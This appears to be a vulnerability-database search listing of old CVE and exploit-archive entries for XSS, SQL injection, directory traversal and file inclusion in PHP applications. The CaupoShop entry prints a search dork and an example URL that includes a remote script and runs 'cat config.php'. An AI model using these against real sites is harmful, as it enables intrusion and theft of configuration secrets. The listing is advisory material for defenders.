7210 matches found
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in Smart-Shop allow remote attackers to inject arbitrary web script or HTML via 1 the email parameter to index.php; or the command parameter to index.php in 2 the default action for the home page, 3 a currencies action, or 4 a basket action...
CVE-2007-5719
SQL injection vulnerability in bbfuncsearch.php in miniBB 2.1 allows remote attackers to execute arbitrary SQL commands via the table parameter to index.php...
CVE-2007-5725
Multiple cross-site scripting XSS vulnerabilities in Smart-Shop allow remote attackers to inject arbitrary web script or HTML via 1 the email parameter to index.php; or the command parameter to index.php in 2 the default action for the home page, 3 a currencies action, or 4 a basket action...
Sql injection
SQL injection vulnerability in bbfuncsearch.php in miniBB 2.1 allows remote attackers to execute arbitrary SQL commands via the table parameter to index.php...
CVE-2007-5692
Multiple cross-site scripting XSS vulnerabilities in SiteBar 3.3.8 allow remote attackers to inject arbitrary web script or HTML via 1 the lang parameter to integrator.php; 2 the token parameter in a New Password action, 3 the nidacl parameter in a Folder Properties action, or 4 the uid parameter...
cauposhop-rfi.txt
dork:allinurl:index.php?action= basket sid vuln:index.php?action= examples: http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php author:[email protected] site:http://mozi.rootmybox.org support:http://darkc0de.com & whoami...
Smart-Shop - index.php Multiple Cross-Site Scripting Vulnerabilities
Smart-Shop - index.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/26232/info SMART-SHOP is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabiliti...
CaupoShop Pro 2.x (action) Remote File Inclusion Vulnerability
No description provided by source. ork:allinurl:index.php?action= basket sid vuln:index.php?action= examples: http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php author:[email protected] site:http://mozi.rootmybox.org support:http://darkc0de.com & whoami...
CVE-2007-5684
Multiple directory traversal vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to include and execute arbitrary files via an absolute pathname in 1 errorhandlerfile and 2 localphp parameters to a tiki-index.php, or 3 encoded "..%2F" sequences in the implanguage parameter to...
Directory traversal
Multiple directory traversal vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to include and execute arbitrary files via an absolute pathname in 1 errorhandlerfile and 2 localphp parameters to a tiki-index.php, or 3 encoded "..%2F" sequences in the implanguage parameter to...
CVE-2007-5684
Multiple directory traversal vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to include and execute arbitrary files via an absolute pathname in 1 errorhandlerfile and 2 localphp parameters to a tiki-index.php, or 3 encoded "..%2F" sequences in the implanguage parameter to...
CVE-2003-1499
CVE-2003-1499 : A directory traversal flaw in Bytehoard 0.7’s index.php allows remote attackers to read arbitrary files by supplying a .. in the infolder parameter. The NVD entry lists CVSS v2 base metrics: AV:N/AC:L/Au:N/C:N/I:N/A:P with a base score of 5.0 (Medium) and network attack vector; ex...
Directory traversal
Directory traversal vulnerability in system.php in ReloadCMS 1.2.7 allows remote attackers to include and execute arbitrary local files via a .. dot dot in the module parameter to index.php...
InstaGuide Weather Index.PHP文件包含漏洞
InstaGuide Weather是一款基于PHP的WEB应用程序。 InstaGuide Weather不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限查看系统文件内容。 问题是'Index.PHP'脚本对用户提交的'PageName'参数缺少过滤,提交应用程序文件作为参数,可导致敏感信息泄露。 InstaGuide Weathe 目前没有解决方案提供: http://www.instaguide.com/index.php?PageName=products http://www.example.com/index.php?PageName=Local File%00...
DM CMS Index.PHP SQL注入漏洞
DM CMS是一款基于PHP的WEB应用程序。 DM CMS不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL攻击,获得敏感信息或操作数据库。 问题是由于'index.php'脚本对用户提交的'id'参数缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,攻击者可以获得敏感信息或操作数据库。 DMCMS 0.7 目前没有详细解决方案提供: http://sourceforge.net/projects/dmcms/ http://www.example.com/index.php?page=media&id=SQL INJECTION CODE GOES HE...
deeemm CMS (dmcms) 0.7 - index.php SQL Injection
deeemm CMS dmcms 0.7 - index.php SQL Injection source: https://www.securityfocus.com/bid/26169/info DMCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...
visolfi.txt
Title : VISO apps Local File Inclusion Vulnerability Description : VISO apps is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. Software: : http://www.viventus.no/visoapps/ Author : d3hydr8 Homepage : http://www.darkc0de.com Original Post :...
CVE-2003-1412
CVE-2003-1412 affects GOsa (GOnicus System Administrator) 1.0. It is a PHP remote file inclusion vulnerability where the plugin parameter in index.php can be controlled to include arbitrary PHP code from several paths: 3fax/1blocklists/index.php, 6departamentadmin/index.php, 5terminals/index.php,...
CVE-2002-2277
PortailPHP 0.99 contains an SQL injection in mod_search/index.php. The vulnerability allows remote attackers to inject SQL via (1) $rech, (2) $BD_Tab_docs, (3) $BD_Tab_file, (4) $BD_Tab_liens, (5) $BD_Tab_faq, or (6) $chemin, potentially affecting confidentiality, integrity, and availability as i...
CVE-2002-2277
SQL injection vulnerability in modsearch/index.php in PortailPHP 0.99 allows remote attackers to execute arbitrary SQL commands via the 1 $rech, 2 $BDTabdocs, 3 $BDTabfile, 4 $BDTabliens, 5 $BDTabfaq, or 6 $chemin variables...